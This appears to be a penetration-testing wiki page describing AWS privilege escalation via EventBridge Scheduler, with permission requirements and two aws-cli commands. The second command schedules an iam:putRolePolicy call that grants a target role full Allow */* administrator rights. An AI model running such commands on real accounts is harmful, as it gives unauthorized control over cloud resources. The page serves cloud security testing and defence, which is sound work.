AWS - EventBridge Scheduler Privesc

EventBridge Scheduler

EventBridge Scheduler can be used for privilege escalation by scheduling calls to various AWS services. By leveraging its ability to invoke services on a scheduled basis, users with sufficient permissions can escalate privileges. Here are some of the key actions EventBridge Scheduler can trigger using templated targets:

• Lambda: lambda:InvokeFunction - Invoke Lambda functions on a schedule.

• CodeBuild: codebuild:StartBuild - Start AWS CodeBuild projects.

• CodePipeline: codepipeline:StartPipelineExecution - Trigger AWS CodePipeline executions.

• ECS: ecs:RunTask - Run ECS tasks.

• EventBridge: events:PutEvents - Put events into EventBridge.

• Inspector: inspector:StartAssessmentRun - Start Amazon Inspector assessments.

• Kinesis: kinesis:PutRecord - Put records into Kinesis streams.

• Firehose: firehose:PutRecord - Put records into Firehose delivery streams.

• SageMaker: sagemaker:StartPipelineExecution - Start SageMaker pipeline executions.

• SNS: sns:Publish - Publish messages to SNS topics.

• SQS: sqs:SendMessage - Send messages to SQS queues.

• Step Functions: states:StartExecution - Start executions of AWS Step Functions.

These are just some of the templated actions EventBridge Scheduler can perform. However, by using universal targets, many other actions across AWS services can be invoked. Universal targets allow for more extensive API operations beyond the templated list.

More info EventBridge Scheduler in:

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

Users with sts:AssumeRole, iam:PassRole, and scheduler:CreateSchedule or scheduler:UpdateSchedule permissions can escalate privileges by leveraging the EventBridge Scheduler to invoke services using a role with higher privileges.

With these permissions, an attacker can assume a role with elevated privileges and pass that role to EventBridge Scheduler when creating or updating a schedule. The schedule can be configured to perform any of the actions listed previously, such as invoking Lambda functions, starting ECS tasks, triggering CodePipeline executions, or any operation of the 270 AWS services supported by EventBridge Scheduler. By scheduling these actions, an attacker could abuse higher privileges to perform unauthorized operations across AWS services. \

For example, they could configure the schedule to invoke a Lambda function which is a templated action:

aws scheduler create-schedule \
    --name MyLambdaSchedule \
    --schedule-expression "rate(5 minutes)" \
    --flexible-time-window "Mode=OFF" \
    --target '{
        "Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
        "RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
    }'

In addition to templated service actions, you can use universal targets in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. One example can be using universal targets adding "AdminAccessPolicy", using a role that has "putRolePolicy" policy:

aws scheduler create-schedule \                                           
    --name GrantAdminToTargetRoleSchedule \
    --schedule-expression "rate(5 minutes)" \
    --flexible-time-window "Mode=OFF" \
    --target '{               
        "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
        "RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
        "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"                
    }'

References

• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html

• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html